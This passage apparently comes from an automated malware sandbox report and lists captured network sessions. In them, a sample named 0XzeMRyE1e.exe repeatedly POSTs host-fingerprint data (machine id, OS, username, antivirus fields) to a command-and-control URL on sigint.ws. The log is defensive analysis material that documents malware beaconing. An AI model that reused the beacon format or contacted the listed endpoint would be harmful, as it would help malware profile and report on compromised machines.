                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:13.991605997 CEST3624INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              14192.168.2.44978880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:00.640844107 CEST3410OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:00.823488951 CEST3410INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              140192.168.2.44992280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:14.194314003 CEST3638OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:14.373663902 CEST3642INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              141192.168.2.44992580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:14.580878973 CEST3643OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:14.763034105 CEST5065INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              142192.168.2.44992780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:14.996722937 CEST5388OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:15.177180052 CEST6684INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              143192.168.2.44992880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:15.391347885 CEST6685OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:15.572180986 CEST7804INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              144192.168.2.44992980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:15.780137062 CEST7805OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:15.961910009 CEST7805INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              145192.168.2.44993080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:16.173253059 CEST7806OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:16.358006001 CEST7808INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              15192.168.2.44978980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:01.077017069 CEST3411OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:01.258260965 CEST3411INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              16192.168.2.44979080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:01.502536058 CEST3412OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:01.682502031 CEST3412INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              17192.168.2.44979180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:01.965477943 CEST3413OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:02.146214008 CEST3413INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              18192.168.2.44979280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:02.409045935 CEST3414OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:02.592430115 CEST3414INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              19192.168.2.44979380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:02.814058065 CEST3415OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:02.996304989 CEST3415INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              2192.168.2.449767185.199.108.133443C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              20192.168.2.44979480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:03.209829092 CEST3415OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:03.389816999 CEST3416INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              21192.168.2.44979580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:03.603998899 CEST3416OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:03.787997007 CEST3417INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              22192.168.2.44979680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:04.522416115 CEST3417OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:04.702900887 CEST3418INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              23192.168.2.44979780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:07.717713118 CEST3418OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:07.904081106 CEST3419INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              24192.168.2.44979880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:08.357861996 CEST3419OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:08.537884951 CEST3419INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              25192.168.2.44979980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:08.864610910 CEST3420OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:09.051507950 CEST3420INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              26192.168.2.44980080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:09.502749920 CEST3421OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:09.686487913 CEST3421INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              27192.168.2.44980180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:10.166146994 CEST3422OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
